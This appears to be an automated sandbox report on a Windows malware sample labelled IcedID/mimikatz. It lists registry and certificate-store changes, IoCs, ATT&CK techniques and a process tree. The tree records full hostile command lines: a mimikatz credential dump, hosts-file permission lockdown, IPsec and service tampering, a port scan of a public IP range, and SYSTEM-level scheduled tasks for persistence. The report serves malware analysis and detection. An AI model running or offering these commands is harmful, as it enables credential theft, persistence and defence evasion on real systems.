Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00cd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	bybsswu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4ED04C59-63BB-4540-8D25-31359484EE9F}\WpadDecisionReason = "1"	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4a-0c-8c-99-49-1c	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00cd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eszugbung.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4a-0c-8c-99-49-1c\WpadDetectedUrl	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4ED04C59-63BB-4540-8D25-31359484EE9F}\WpadDecisionTime = 1090b9349875da01	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4ED04C59-63BB-4540-8D25-31359484EE9F}\4a-0c-8c-99-49-1c	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	bybsswu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4a-0c-8c-99-49-1c\WpadDecisionReason = "1"	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\4a-0c-8c-99-49-1c\WpadDecisionTime = 1090b9349875da01	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals	eszugbung.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	bybsswu.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	bybsswu.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	bybsswu.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1404	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1416	bybsswu.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe

Suspicious behavior: LoadsDriver 31 IoCs

pid	Process
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found
468	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2524	bybsswu.exe
Token: SeDebugPrivilege	2660	bybsswu.exe
Token: SeDebugPrivilege	2920	vfshost.exe
Token: SeAuditPrivilege	2544	svchost.exe
Token: SeLockMemoryPrivilege	2408	bsuyvg.exe
Token: SeDebugPrivilege	2556	eszugbung.exe
Token: SeShutdownPrivilege	2556	eszugbung.exe
Token: SeLockMemoryPrivilege	2408	bsuyvg.exe
Token: SeDebugPrivilege	2904	eszugbung.exe
Token: SeShutdownPrivilege	2904	eszugbung.exe
Token: SeDebugPrivilege	2620	eszugbung.exe
Token: SeShutdownPrivilege	2620	eszugbung.exe
Token: SeDebugPrivilege	2528	eszugbung.exe
Token: SeShutdownPrivilege	2528	eszugbung.exe
Token: SeDebugPrivilege	992	eszugbung.exe
Token: SeShutdownPrivilege	992	eszugbung.exe
Token: SeDebugPrivilege	2652	eszugbung.exe
Token: SeShutdownPrivilege	2652	eszugbung.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
2524	bybsswu.exe
2524	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2028	xohudmc.exe
2844	kkqiuy.exe
1416	bybsswu.exe
1416	bybsswu.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 1952	2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe	28
PID 2224 wrote to memory of 1952	2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe	28
PID 2224 wrote to memory of 1952	2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe	28
PID 2224 wrote to memory of 1952	2224	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe	28
PID 1952 wrote to memory of 1404	1952	cmd.exe	30
PID 1952 wrote to memory of 1404	1952	cmd.exe	30
PID 1952 wrote to memory of 1404	1952	cmd.exe	30
PID 1952 wrote to memory of 1404	1952	cmd.exe	30
PID 1952 wrote to memory of 2524	1952	cmd.exe	31
PID 1952 wrote to memory of 2524	1952	cmd.exe	31
PID 1952 wrote to memory of 2524	1952	cmd.exe	31
PID 1952 wrote to memory of 2524	1952	cmd.exe	31
PID 2660 wrote to memory of 2516	2660	bybsswu.exe	33
PID 2660 wrote to memory of 2516	2660	bybsswu.exe	33
PID 2660 wrote to memory of 2516	2660	bybsswu.exe	33
PID 2660 wrote to memory of 2516	2660	bybsswu.exe	33
PID 2516 wrote to memory of 2968	2516	cmd.exe	35
PID 2516 wrote to memory of 2968	2516	cmd.exe	35
PID 2516 wrote to memory of 2968	2516	cmd.exe	35
PID 2516 wrote to memory of 2968	2516	cmd.exe	35
PID 2516 wrote to memory of 2544	2516	cmd.exe	36
PID 2516 wrote to memory of 2544	2516	cmd.exe	36
PID 2516 wrote to memory of 2544	2516	cmd.exe	36
PID 2516 wrote to memory of 2544	2516	cmd.exe	36
PID 2516 wrote to memory of 2416	2516	cmd.exe	37
PID 2516 wrote to memory of 2416	2516	cmd.exe	37
PID 2516 wrote to memory of 2416	2516	cmd.exe	37
PID 2516 wrote to memory of 2416	2516	cmd.exe	37
PID 2516 wrote to memory of 2412	2516	cmd.exe	38
PID 2516 wrote to memory of 2412	2516	cmd.exe	38
PID 2516 wrote to memory of 2412	2516	cmd.exe	38
PID 2516 wrote to memory of 2412	2516	cmd.exe	38
PID 2516 wrote to memory of 2520	2516	cmd.exe	39
PID 2516 wrote to memory of 2520	2516	cmd.exe	39
PID 2516 wrote to memory of 2520	2516	cmd.exe	39
PID 2516 wrote to memory of 2520	2516	cmd.exe	39
PID 2516 wrote to memory of 2924	2516	cmd.exe	40
PID 2516 wrote to memory of 2924	2516	cmd.exe	40
PID 2516 wrote to memory of 2924	2516	cmd.exe	40
PID 2516 wrote to memory of 2924	2516	cmd.exe	40
PID 2660 wrote to memory of 2388	2660	bybsswu.exe	41
PID 2660 wrote to memory of 2388	2660	bybsswu.exe	41
PID 2660 wrote to memory of 2388	2660	bybsswu.exe	41
PID 2660 wrote to memory of 2388	2660	bybsswu.exe	41
PID 2660 wrote to memory of 2880	2660	bybsswu.exe	43
PID 2660 wrote to memory of 2880	2660	bybsswu.exe	43
PID 2660 wrote to memory of 2880	2660	bybsswu.exe	43
PID 2660 wrote to memory of 2880	2660	bybsswu.exe	43
PID 2660 wrote to memory of 2372	2660	bybsswu.exe	45
PID 2660 wrote to memory of 2372	2660	bybsswu.exe	45
PID 2660 wrote to memory of 2372	2660	bybsswu.exe	45
PID 2660 wrote to memory of 2372	2660	bybsswu.exe	45
PID 2660 wrote to memory of 2712	2660	bybsswu.exe	47
PID 2660 wrote to memory of 2712	2660	bybsswu.exe	47
PID 2660 wrote to memory of 2712	2660	bybsswu.exe	47
PID 2660 wrote to memory of 2712	2660	bybsswu.exe	47
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2712 wrote to memory of 2740	2712	cmd.exe	49
PID 2740 wrote to memory of 2780	2740	wpcap.exe	50

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:280
- C:\Windows\TEMP\ajszieiei\bsuyvg.exe
  "C:\Windows\TEMP\ajszieiei\bsuyvg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2408

C:\Users\Admin\AppData\Local\Temp\2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nubbucjk\bybsswu.exe
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:1404
- - C:\Windows\nubbucjk\bybsswu.exe
    C:\Windows\nubbucjk\bybsswu.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2524

C:\Windows\nubbucjk\bybsswu.exe
C:\Windows\nubbucjk\bybsswu.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:2924
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Modifies data under HKEY_USERS
  PID:2388
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Modifies data under HKEY_USERS
  PID:2880
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:2372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mfebbbrby\tgykbkbiz\wpcap.exe /S
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\mfebbbrby\tgykbkbiz\wpcap.exe
    C:\Windows\mfebbbrby\tgykbkbiz\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      PID:2780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:1988
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      PID:2328
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:1972
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      PID:1916
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:2180
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:1632
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1452
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:1732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:2292
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mfebbbrby\tgykbkbiz\hzuqkpuek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mfebbbrby\tgykbkbiz\Scant.txt
  2⤵
  - Loads dropped DLL
  PID:3044
- - C:\Windows\mfebbbrby\tgykbkbiz\hzuqkpuek.exe
    C:\Windows\mfebbbrby\tgykbkbiz\hzuqkpuek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mfebbbrby\tgykbkbiz\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\mfebbbrby\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mfebbbrby\Corporate\log.txt
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:1636
- - C:\Windows\mfebbbrby\Corporate\vfshost.exe
    C:\Windows\mfebbbrby\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lubbrlheb" /ru system /tr "cmd /c C:\Windows\ime\bybsswu.exe"
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lubbrlheb" /ru system /tr "cmd /c C:\Windows\ime\bybsswu.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uczltbugk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nubbucjk\bybsswu.exe /p everyone:F"
  2⤵
  PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "uczltbugk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nubbucjk\bybsswu.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "evgrntiyh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ajszieiei\bsuyvg.exe /p everyone:F"
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1876
